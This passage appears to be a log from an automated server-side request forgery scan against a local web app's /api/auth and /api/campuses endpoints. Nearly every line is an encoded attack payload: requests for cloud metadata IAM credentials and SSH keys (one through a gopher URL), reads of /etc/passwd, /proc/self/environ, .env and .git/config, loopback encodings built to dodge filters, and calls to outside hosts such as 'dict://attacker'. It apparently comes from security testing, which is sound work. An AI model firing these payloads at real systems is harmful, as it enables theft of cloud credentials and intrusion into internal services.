`http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/auth?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/auth?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/auth?url=instance-data` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A22` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A443` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A80` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/auth?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/auth?url=loopback` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A22` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A80` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A443` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/auth?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/auth?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/auth?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/auth?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/auth?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/auth?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/auth?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/auth?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/auth?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/auth?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/auth?url=127.1%3A80` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/auth?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/auth?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/auth?url=2130706433%2F` +- Testing: `http://localhost:4200/api/auth?url=3232235521%2F` +- Testing: `http://localhost:4200/api/auth?url=3232235777%2F` +- Testing: `http://localhost:4200/api/auth?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/auth?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/auth?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/auth?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/auth?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/auth?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/auth?url=0%2F` +- Testing: `http://localhost:4200/api/auth?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/campuses +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/campuses?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/campuses?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/campuses?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/campuses?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/campuses?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/campuses?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/campuses?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/campuses?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/campuses?url=127.1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=0` +- Testing: `http://localhost:4200/api/campuses?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/campuses?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/campuses?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/campuses?url=127.127.127.127` +- Testing: `http://localhost:4200/api/campuses?url=127.0.1.3` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.0` +- Testing: `http://localhost:4200/api/campuses?url=2130706433` +- Testing: `http://localhost:4200/api/campuses?url=017700000001` +- Testing: `http://localhost:4200/api/campuses?url=0x7f000001` +- Testing: `http://localhost:4200/api/campuses?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/campuses?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/campuses?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/campuses?url=google.com.localhost` +- Testing: `http://localhost:4200/api/campuses?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=localtest.me` +- Testing: `http://localhost:4200/api/campuses?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/campuses?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/campuses?url=2130706433%2F` +- Testing: `http://localhost:4200/api/campuses?url=3232235521%2F` +- Testing: `http://localhost:4200/api/campuses?url=3232235777%2F` +- Testing: `http://localhost:4200/api/campuses?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/campuses?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/campuses?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/campuses?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/campuses?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/campuses?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/campuses?url=0%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1` +- Testing: `http://localhost:4200/api/campuses?url=127.0.1` +- Testing: `http://localhost:4200/api/campuses?url=localtest.me` +- Testing: `http://localhost:4200/api/campuses?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/campuses?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/campuses?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/campuses?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/campuses?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.0.1.3` +- Testing: `http://localhost:4200/api/campuses?url=0` +- Testing: `http://localhost:4200/api/campuses?url=127.1` +- Testing: `http://localhost:4200/api/campuses?url=127.0.1` +- Testing: `http://localhost:4200/api/campuses?url=localhost` +- Testing: `http://localhost:4200/api/campuses?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/campuses?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/campuses?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/campuses?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/campuses?url=7F000001` +- Testing: `http://localhost:4200/api/campuses?url=2130706433` +- Testing: `http://localhost:4200/api/campuses?url=6425673729` +- Testing: `http://localhost:4200/api/campuses?url=127001` +- Testing: `http://localhost:4200/api/campuses?url=127_0._0_1` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/campuses?url=localtest.me` +- Testing: `http://localhost:4200/api/campuses?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/campuses?url=127.127.127.127` +- Testing: `http://localhost:4200/api/campuses?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/campuses?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=0x7f000001` +- Testing: `http://localhost:4200/api/campuses?url=017700000001` +- Testing: `http://localhost:4200/api/campuses?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/campuses?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/campuses?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/campuses?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/campuses?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/campuses?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/campuses?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/campuses?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254` +- Testing: `http://localhost:4200/api/campuses?url=2852039166` +- Testing: `http://localhost:4200/api/campuses?url=7147006462` +- Testing: `http://localhost:4200/api/campuses?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/campuses?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/campuses?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/campuses?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/campuses?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/campuses?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/campuses?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/campuses?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/campuses?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/campuses?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/campuses?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/campuses?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/campuses?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/campuses?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/campuses?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/campuses?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/campuses?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/campuses?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/campuses?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/campuses?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/campuses?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/campuses?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/campuses?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/campuses?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.0` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/campuses?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/campuses?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/campuses?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/campuses?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/campuses?url=3232235521` +- Testing: `http://localhost:4200/api/campuses?url=3232235777` +- Testing: `http://localhost:4200/api/campuses?url=425.510.425.510` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D` 